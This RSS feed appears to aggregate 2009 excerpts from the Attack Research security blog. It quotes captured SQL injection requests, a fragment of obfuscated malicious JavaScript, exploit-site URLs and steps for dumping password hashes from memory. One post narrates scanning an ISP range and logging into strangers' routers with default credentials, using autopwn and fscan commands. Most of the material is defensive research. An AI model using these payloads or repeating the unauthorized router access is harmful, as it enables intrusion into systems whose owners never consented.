<?xml version="1.0" encoding="utf-8"?>
<rss version="0.92">
<channel>
<title>SecuObs.com</title>
<link>http://www.secuobs.com</link>
<description>Internet security observatory</description>
<language>fr</language>
<webMaster>webmaster@secuobs.com</webMaster>
<item><title>Spammers, Feedback, and more</title><description>2009-04-29 23:29:17 - Attack Research : So we are being continually pounded by Russian and Chinese blog spam. I almost have enough material now for another talk. Keep it coming, guys. Also Colin and I received our feedback from Blackhat DC and I'm happy to say we did very well, up above the 90% satisfaction mark. This is the best rating I've ever received on any presentation I've been involved in giving. Thanks to all those that reviewed our presentation, and we hope to keep up and continue this standard of quality in the future. read more</description><link>http://www.secuobs.com/revue/news/90226.shtml</link><guid isPermaLink="false">http://www.secuobs.com/revue/news/90226.shtml</guid></item>
<item><title>First Blog Spam on AR</title><description>Secuobs.com : 2009-04-15 03:58:42 - Attack Research - So on Sat, 04/11/2009 - 22:57 a post was made to AR titled: dfhfghgf. It was submitted by Acrombrow, whose email address is: daxydiateerie@mailru and whose IP address is: 195224099. This is the text of the post: read more</description><link>http://www.secuobs.com/revue/news/83429.shtml</link><guid isPermaLink="false">http://www.secuobs.com/revue/news/83429.shtml</guid></item>
<item><title>Very worthwhile post at carnal0wnage by Tebo</title><description>Secuobs.com : 2009-04-09 04:37:42 - Attack Research - Full article: click here. Automatic credential collection and storage with CredCollect. read more</description><link>http://www.secuobs.com/revue/news/81332.shtml</link><guid isPermaLink="false">http://www.secuobs.com/revue/news/81332.shtml</guid></item>
<item><title>Banking Spam - Northern Trust Bank Report: SSL Certificate Installation</title><description>Secuobs.com : 2009-03-28 19:35:37 - Attack Research - So doing my usual digging for malware I came across this spam email containing a request to install their new CA cert so that they could start issuing end user certs. Very kind of them. Northern Trust Corporation Warning: Beginning March 17, 2009, the Northern Trust Business Passport Center will use a new Certification Authority (CA) to issue end-user certificates. If no one in your organization has a digital certificate, you will need to download your primary digital certificate file. Installation is quick and simple. read more</description><link>http://www.secuobs.com/revue/news/76345.shtml</link><guid isPermaLink="false">http://www.secuobs.com/revue/news/76345.shtml</guid></item>
<item><title>Reasons Boston Source is my new favorite conference:</title><description>Secuobs.com : 2009-03-14 03:53:03 - Attack Research - Dinners, drinks, and conversation with: Stacey, Dildog, Weld, Dino, Tam, Sotirov, FreakOut, Whitetras, Jose Nazario, Lenny Zeltser, cg, Vince, Colin, Dave Kerb, Marty Roesch, Kaminsky, Jennifer, Travis Goodspeed, Courtnee, drwho, Carrie, Jamie, slow, Ero, Nico, Dan Guido, and many many more. This conference was excellent; it was small and many of the attendees were researchers. You could spend time meeting and talking to people without constantly being mobbed by others. I saw some of the best talks I've ever seen, to include: Jose Nazario on Political DDOS. read more</description><link>http://www.secuobs.com/revue/news/71067.shtml</link><guid isPermaLink="false">http://www.secuobs.com/revue/news/71067.shtml</guid></item>
<item><title>The future of Cyber Warfare</title><description>Secuobs.com : 2009-03-11 17:14:43 - Attack Research - There are many different tools available to attackers. Tools like Metasploit, exploits at Milworm, and even tools like Nessus focus on exploiting a single vulnerability, getting one machine on the network. While this is all well and good, and these are excellent tools, they lack the ability to organize a complete, effective attack. I have been working on the idea of making both the attack and defence of networks more like an RTS game. I kept saying I wanted to make the tool before writing this, but I have been working on the tool on and off for 3-4 years, and I am not getting younger. So I figured I would brain dump, and if someone with more time than I gets to work on it, great; I'll kick myself for not finishing, but that's life. read more</description><link>http://www.secuobs.com/revue/news/70141.shtml</link><guid isPermaLink="false">http://www.secuobs.com/revue/news/70141.shtml</guid></item>
<item><title>Exploit site Includes PDF exploit</title><description>Secuobs.com : 2009-03-07 19:06:39 - Attack Research - WARNING: THESE LINKS ARE MALICIOUS. Ok, several sites hosting malware deployment. Might be part of the Tornado kit, unsure. wsxhostnet/countphpo=2 is the first, but it appears broken. It wants you to redirect off to http://20273576/tomi/t=2 which doesn't appear to do anything. The next site is http://do21net/cv/countphpo=3. This site deploys at least 3 exploits that I can find, probably more. http://do21net/cv/countphpo=4 script var donn=Array63/*0*/,0/*0*/,0/*0*/,0/*0*/,0/*0*/,0/*0*/,0/*0*/,0/*0*/,0/*0*/,0/*0*/,0/*0*/,0/*0*/,0/*0*/,0/ read more</description><link>http://www.secuobs.com/revue/news/68397.shtml</link><guid isPermaLink="false">http://www.secuobs.com/revue/news/68397.shtml</guid></item>
<item><title>Dumping Memory to extract Password Hashes Part 1</title><description>Secuobs.com : 2009-03-07 04:06:17 - Attack Research - Dumping memory with MDD using Meterpreter, adapted from: http://pauldotcom.com/wiki/index.php/Episode142. ManTech Memory DD (MDD), http://www.mantech.com/msma/MDD.asp, is released under GPL by ManTech International. MDD is capable of copying the complete contents of memory on the following Microsoft Operating Systems: Windows 2000, Windows XP, Windows 2003 Server, Windows 2008 Server. After downloading MDD from the ManTech site you need to run the program at the command line. MDD Command Line Usage: mdd -o OUTPUTFILENAME. Example: read more</description><link>http://www.secuobs.com/revue/news/68341.shtml</link><guid isPermaLink="false">http://www.secuobs.com/revue/news/68341.shtml</guid></item>
<item><title>Dumping Memory to extract Password Hashes Part 2</title><description>Secuobs.com : 2009-03-07 04:06:17 - Attack Research - Now that we have our dd image locally, you can utilize the instructions from http://forensiczone.blogspot.com/2009/01/using-volatility-1.html to grab the passwords out of memory. Volatility -- https://www.volatilesystems.com/default/volatility read more</description><link>http://www.secuobs.com/revue/news/68340.shtml</link><guid isPermaLink="false">http://www.secuobs.com/revue/news/68340.shtml</guid></item>
<item><title>Here we go again: CHAR II, the return of CHAR</title><description>Secuobs.com : 2009-02-22 21:48:42 - Attack Research - Fresh from the logs, CHAR based attacks against our dear little blog:
"GET/nsortaspnsort_id=598etsort_id=143%20And%20char124%2bSelect%20CastCount1%20as%20varchar8000%2Bchar124%20From%20sysobjects%20Where%201=10"
"GET/viewsaspnsort_id=546ethw_id=25978etsort_id=195'%20And%20char124%2bSelect%20CastCount1%20as%20varchar8000%2Bchar124%20From%20sysobjects%20Where%201=10%20and%20''='
read more</description><link>http://www.secuobs.com/revue/news/64058.shtml</link><guid isPermaLink="false">http://www.secuobs.com/revue/news/64058.shtml</guid></item>
<item><title>Updates from Blackhat DC</title><description>Secuobs.com : 2009-02-20 02:33:04 - Attack Research - Blackhat DC is about to wrap up and the AR team had a great time. The DC crowd is significantly smaller than Vegas, which makes it easier to connect with people and not be overwhelmed by the numbers. We got to see some old friends and meet some new and awesome people. Highlights for me were David Litchfield and Adam Laurie's talks. Litchfield took some crazy pile of slides full of hex bytes and turned it into a useful Oracle forensics tool. Laurie was very entertaining and is doing some cool stuff tracking satellites. Even more impressive was his RFID man in the middle attack. read more</description><link>http://www.secuobs.com/revue/news/63422.shtml</link><guid isPermaLink="false">http://www.secuobs.com/revue/news/63422.shtml</guid></item>
<item><title>Blackhat DC</title><description>Secuobs.com : 2009-02-15 00:06:20 - Attack Research - February 16-19 some of the AR team and HD Moore will be in DC at the Hyatt Regency Crystal City, Reagan National Airport. First up, HD and I will teach our Tactical Exploitation class (sold out). This class will focus on breaking into computers without exploits, profiling your targets, trust relationships and more. Then on the 19th, Colin Ames and I will be talking about dissecting web based attacks. Colin and I took apart two attacks, one coming from Russia and one coming from China, that use web technologies to push malware and exploits to visitors of trusted websites. We track one of them back to the attacker's home DSL IP in Russia because of some mistakes he made in his MPACK installation. We completely dissect his whole infrastructure including domains, IPs, links, RE of the malware, etc. Next we tear apart an interesting Chinese attack. This one focuses on injecting a tiny piece of code into trusted sites, such as equipment vendors, which redirects users to a spider web of malicious sites in the background. They take advantage of SQL injection, malicious graphics files, 0day browser exploits and heavily obfuscated javascript. Several of the things they do provide evidence that they are indeed from China, and we will reveal the details of their techniques. A lot of these types of attacks have been around for a long time, but rarely are the details so fully understood or explained in the depth that we are going to provide. I hope to see you there. V read more</description><link>http://www.secuobs.com/revue/news/61944.shtml</link><guid isPermaLink="false">http://www.secuobs.com/revue/news/61944.shtml</guid></item>
<item><title>Distributed Denial Of Service</title><description>Secuobs.com : 2009-02-10 04:52:26 - Attack Research - If you are having problems reaching http://www.attackresearch.com, this is because for several days we have been under a DDOS attack which was targeted at the Metasploit server as well as several other high profile security websites. Temporarily you can reach the site via http://www.attackresearch.com:8000 (thanks HDM). HD Moore has posted significant details on his blog. Thanks for your patience, and thanks to the attackers for giving us more attacks to talk about. V</description><link>http://www.secuobs.com/revue/news/60234.shtml</link><guid isPermaLink="false">http://www.secuobs.com/revue/news/60234.shtml</guid></item>
<item><title>Fans or Foes, part III</title><description>Secuobs.com : 2009-02-10 03:08:48 - Attack Research - In the last installment of Fans or Foes, we were able to identify a number of FQDNs that had been pointed to the AR blog. This time around we will answer the age old question "Why not do something about it?" First off, we filtered through the logs to find referrer entries that gave away our uninvited guests, in order to make it a little easier to spot the current and future offending FQDNs. We will do this by creating a new log file that only logs referrer information. read more</description><link>http://www.secuobs.com/revue/news/60191.shtml</link><guid isPermaLink="false">http://www.secuobs.com/revue/news/60191.shtml</guid></item>
<item><title>Detecting Binary Packers with Snort</title><description>Secuobs.com : 2009-02-05 04:32:18 - Attack Research - Binary packers are notoriously known to be used alongside malicious code. Although there is a legitimate use for them, not everyone is willing to take the risk. I have been researching a method of detecting the binary signature of a file within the network stream without extracting the binary itself. Currently, I have been able to develop a Snort rule set that I translated straight from PEiD signatures with a Python script I wrote. The only drawback is that Snort can not use wildcard bytes, whereas PEiD does. read more</description><link>http://www.secuobs.com/revue/news/58674.shtml</link><guid isPermaLink="false">http://www.secuobs.com/revue/news/58674.shtml</guid></item>
<item><title>Fans or Foes, part II</title><description>Secuobs.com : 2009-01-28 00:46:31 - Attack Research - After reading what Valsmith posted about other FQDNs being pointed to AR, I decided to do some research myself. Let's go to the logs. A typical web log entry looks something like this:
666666666666 - - 27/Jan/2095:04:23:10 -0900 "GET /q=user/666HTTP/11" 200 6062 "http://blogattackresearchcom/" "Mozilla/50Windows; U; Windows NT 60; en-US; rv:1905 Gecko/2008120122Firefox/305"
Note: All log entries are modified slightly, as you can tell. No soft intel here. read more</description><link>http://www.secuobs.com/revue/news/55740.shtml</link><guid isPermaLink="false">http://www.secuobs.com/revue/news/55740.shtml</guid></item>
<item><title>Tactical Exploitation Training at Black Hat DC</title><description>Secuobs.com : 2009-01-24 07:22:44 - Attack Research - HD Moore and I are offering a Tactical Exploitation course for BlackHat DC on February 16th and 17th. This two-day course introduces a tactical approach that does not rely on exploiting known vulnerabilities. Using a combination of new tools and lesser-known techniques, students will learn how to compromise systems without depending on standard exploits. This course is limited to a small number of seats (less than 15) and we only have a few spots left. For examples of the types of things this course covers, please see our original Black Hat slides and the first half of our Defcon talk. read more</description><link>http://www.secuobs.com/revue/news/54799.shtml</link><guid isPermaLink="false">http://www.secuobs.com/revue/news/54799.shtml</guid></item>
<item><title>Quick radix hack</title><description>Secuobs.com : 2009-01-23 14:25:03 - Attack Research -
#!/usr/local/bin/ruby
if ARGV.length == 0
puts "Usage: ft value"
puts "ft = from / to = b||o||d||h"
puts "ie from octal to binary: ob"
exit 0
end
if ARGV.length != 2
puts "2 inputs"
exit 0
end
ft = ARGV[0].to_s
i = ARGV[1]
result = case ft
when "bo": i.to_i(base=2).to_s(base=8)
when "bd": i.to_i(base=2).to_s(base=10)
when "bh": i.to_i(base=2).to_s(base=16)
when "ob": i.to_i(base=8).to_s(base=2)
when "od": i.to_i(base=8).to_s(base=10)
when "oh": i.to_i(base=8).to_s(base=16)
when "db": i.to_i(base=10).to_s(base=2)
read more</description><link>http://www.secuobs.com/revue/news/54469.shtml</link><guid isPermaLink="false">http://www.secuobs.com/revue/news/54469.shtml</guid></item>
<item><title>Dissecting a Multistage Web Attack that uses the recent IE7 0day, Part II</title><description>Secuobs.com : 2009-01-15 21:25:23 - Attack Research - This is a continuation of the post "Dissecting a Multistage Web Attack that uses IE7 0day". As we mentioned in the previous part of this series, we saw various attackers from China trying SQLi against this victim. Here is an example of the attacks they attempted:
2008-12-01 08:17:22 W3SVC864329 WEB1 1921681victimip GET /vuln3asp ID=145'%20and%20char124%2Buser%2Bchar124=0%20and%20''=' 80 - 12311184170 HTTP/11 Internet+Explorer+60 - - wwwvictimcom 302 0 0 521 140 390
read more</description><link>http://www.secuobs.com/revue/news/51842.shtml</link><guid isPermaLink="false">http://www.secuobs.com/revue/news/51842.shtml</guid></item>
<item><title>Dissecting a Multistage Web Attack that uses the recent IE7 0day, Part III</title><description>Secuobs.com : 2009-01-15 21:25:23 - Attack Research - This is a continuation of the post "Dissecting a Multistage Web Attack that uses the recent IE7 0Day". So at this point we know how the attackers got command and control and their code onto the victim website, and we know how they are directing visitors to their malicious web page. But what happens once they are there? The source code of the javascript gives us a starting point for clues:
document.write(" ");
document.write(" ");
read more</description><link>http://www.secuobs.com/revue/news/51841.shtml</link><guid isPermaLink="false">http://www.secuobs.com/revue/news/51841.shtml</guid></item>
<item><title>Fans or Foes</title><description>Secuobs.com : 2009-01-15 21:25:23 - Attack Research - So I was doing a little vanity googling and came across something rather weird in the results:
# Attack Research | Defense Is Dead. Valsmith decided to found this site after leaving Offensive Computing with a simple malware analysis into the larger world of total attack research. wwwcntradecitycom/ - 15k - Cached - Similar pages -
# Attack Research. Attack Research Soon | valsmith@metasploitcom | wwwcntradeshopcom/ - 1k - Cached - Similar pages -
# Attack Research. Attack Research Soon | valsmith@metasploitcom |
read more</description><link>http://www.secuobs.com/revue/news/51840.shtml</link><guid isPermaLink="false">http://www.secuobs.com/revue/news/51840.shtml</guid></item>
<item><title>Maybe they didn't like my post</title><description>Secuobs.com : 2009-01-15 21:25:23 - Attack Research - Or maybe it's just the common stuff that goes on all the time. I've gotten upwards of 40,000 SSH attempts from China in the last couple of days. Example:
Jan  5 06:52:08 ubuntu sshd20254: Failed password for invalid user fabia from 116725586 port 36768 ssh2
Jan  5 06:52:09 ubuntu sshd20256: Invalid user fabienne from 116725586
Jan  5 06:52:09 ubuntu sshd20256: pam_unixsshd:auth: check pass; user unknown
Jan  5 06:52:09 ubuntu sshd20256: pam_unixsshd:auth: authentication failure; logname= uid=0 euid=0 tty=ssh ruser= rhost=116725586
read more</description><link>http://www.secuobs.com/revue/news/51839.shtml</link><guid isPermaLink="false">http://www.secuobs.com/revue/news/51839.shtml</guid></item>
<item><title>14.htm Original Obfuscated Javascript from 17gamocom</title><description>Secuobs.com : 2009-01-15 21:25:23 - Attack Research - windowonerror=function{return true;} evalfunctionp,a,c,k,e,d{e=functionc{returnc35StringfromCharCodec+29:ctoString36};if''replace/^/,String{whilec--{dec=kc||ec}k=functione{returnde};e=function{return'\w+'};c=1};whilec--{ifkc{p=preplacenewRegExp'\b'+ec+'\b','g',kc}}returnp}'1d=\'1y://1z1x1w/1u/1AQ\';N=\'151B \';R=\'151D\';k=1C"d"+"o"+"c"+"u"+"m"+"e"+"n"+"t""c"+"r"+"e"+"a"+"t"+"e"+"E"+"l"+"e"+"m"+"e"+"n"+"t""o"+"b"+"j"+"e"+"c"+"t"; read more</description><link>http://www.secuobs.com/revue/news/51838.shtml</link><guid isPermaLink="false">http://www.secuobs.com/revue/news/51838.shtml</guid></item>
<item><title>Dissecting a Multistage Web Attack that uses IE7 0day, Part IV</title><description>Secuobs.com : 2009-01-15 21:25:23 - Attack Research - This is a continuation of the post "Dissecting a Multistage Web Attack that uses the recent IE7 0Day". At the end of the previous post we saw the attackers were delivering an IE 07 exploit. Now we will take a step back and look at what else they are doing. First, regardless of whether or not the browser is running IE, they send the browser to two IFRAMES, 14.htm and flash.htm. read more</description><link>http://www.secuobs.com/revue/news/51837.shtml</link><guid isPermaLink="false">http://www.secuobs.com/revue/news/51837.shtml</guid></item>
<item><title>Curiosity</title><description>Secuobs.com : 2009-01-15 21:25:23 - Attack Research - So I'm curious: is anyone else seeing any interesting attacks? One thing that seems to be very common is SSH brute forcing. A lot of it coming from China of course, Italy and Romania. Obviously having complex passwords is a good idea, but what about lockouts? The attacks I've seen try a bunch of different user names but also root. Lockouts would be a good self DoS, but Windows has them for regular users. What I really want to know is, what do these SSH brute forcers do once they get in? Anyone hit successfully by this? It's ok, you can admit it, we promise we won't make fun of you :) read more</description><link>http://www.secuobs.com/revue/news/51836.shtml</link><guid isPermaLink="false">http://www.secuobs.com/revue/news/51836.shtml</guid></item>
<item><title>A lot of routers still openly accessible for intruders</title><description>Secuobs.com : 2009-01-15 21:25:23 - Attack Research - When I was playing around with MSF (MetaSploit Framework), I wanted to try out more with the "autopwn" function. For those who do not know how it works, here is the standard command-set that I use for it: load db_sqlite3, db_destroy, db_create, db_nmap -vv iprange1-254 (with maybe some other arguments you like). Then it uses nmap to scan the IP-addresses, and adds them to the sqlite3 database. Once the scan is finished, you can see the results by using: db_hosts. This will output all the IP-addresses that are added to the database and will also give you information about a possible OS running on the system. The following command that I usually do is obviously the autopwn function. Like this: db_autopwn -p -t -e. Enough about that, let's get back to the subject that I really want to talk about here. So I decided to go wild, and googled for some Brazilian IP-range, which in this case was "20122183x". Once I started the nmap scan, with only the -vv option and the ip-range "201221831-254", quickly there was a lot of output on my screen with IP-addresses that had port 80 open on that range. I decided to visit one in my browser and found out it was locked with a username and password. I saw "DSL Router" in it, so I gave "admin / admin" a shot, with success: I was in and had access to the router. So I tried some more, and came across different kinds of routers, and even camera systems. I reminded myself that I downloaded a HTTP Auth Scanner a few days ago, that uses the standard passwords such as "admin / admin", "tech / tech", "root / root" etc. The scanner is called "fscan", or "Fast HTTP Auth Scanner v06". More information and a download link can be found here: http://www514es/2007/07/fast_http_auth_scannerhtml. Obviously I could not wait to give this a try, so I started up cmd on my laptop, and started the scanner. But now I did the complete c-class range, so 20122. Here is the command I used: fscan.exe --ports 80 --hosts 2012211-20122255254 --threads 100. I did not really expect that much, but there was more vulnerable than expected. Very many IP-addresses on the range had port 80 open with their router software externally accessible for everyone who had the password or who, like me in this case, tried a tiny bruteforce on it with standard passwords. Here is the result of fscan.exe: http://pastebincom/m4c5cdba5. As you can see, this is pretty shocking, in some weird kind of way. Remember this is only one ISP/IP-range that has been scanned and I am pretty sure there are a lot of these out there. Maybe I will try to find more; however, I am not using it for other things than knowledge. Some routers can be programmed in some way that they can execute or host things, or if you change certain things in the routers you could probably even access the connected computers easily. Imagine having a few computers scanning IP-ranges like this, and using them for the bad. ~KL read more</description><link>http://www.secuobs.com/revue/news/51835.shtml</link><guid isPermaLink="false">http://www.secuobs.com/revue/news/51835.shtml</guid></item>
<item><title>so uuh who is 112252347 anyway</title><description>Secuobs.com : 2009-01-15 21:25:23 - Attack Research - After noticing Val's post on his vanity search (he Googles (no, this is not a verb ;) himself a lot, doesn't he?) I thought 'who? what?' &lt;- I know this guy in China. No, not really. read more</description><link>http://www.secuobs.com/revue/news/51834.shtml</link><guid isPermaLink="false">http://www.secuobs.com/revue/news/51834.shtml</guid></item>
<item><title>112252347 part deux</title><description>Secuobs.com : 2009-01-15 21:25:23 - Attack Research - I post. http://wwwcntradeshopcom/ is... well, let's see. Why yes, it's updated with my story, which leads me to believe that a) 112252347 is using that happy fun MITM thing. Let's see: http://71616774/ cntradeshopcom, IP based: yes, it's AR o_O
71616774 cntradeshopcom
HEAD / HTTP/10
HTTP/11 400 Bad Request
Date: Wed, 14 Jan 2009 16:30:19 GMT
Server: Apache/228 Ubuntu PHP/524-2ubuntu54 with Suhosin-Patch
X-Powered-By: PHP/524-2ubuntu54
Connection: close
Content-Type: text/html
ubuntu suhosin patch
6624021381 AR
HEAD / HTTP/10
read more</description><link>http://www.secuobs.com/revue/news/51833.shtml</link><guid isPermaLink="false">http://www.secuobs.com/revue/news/51833.shtml</guid></item>
</channel>
</rss>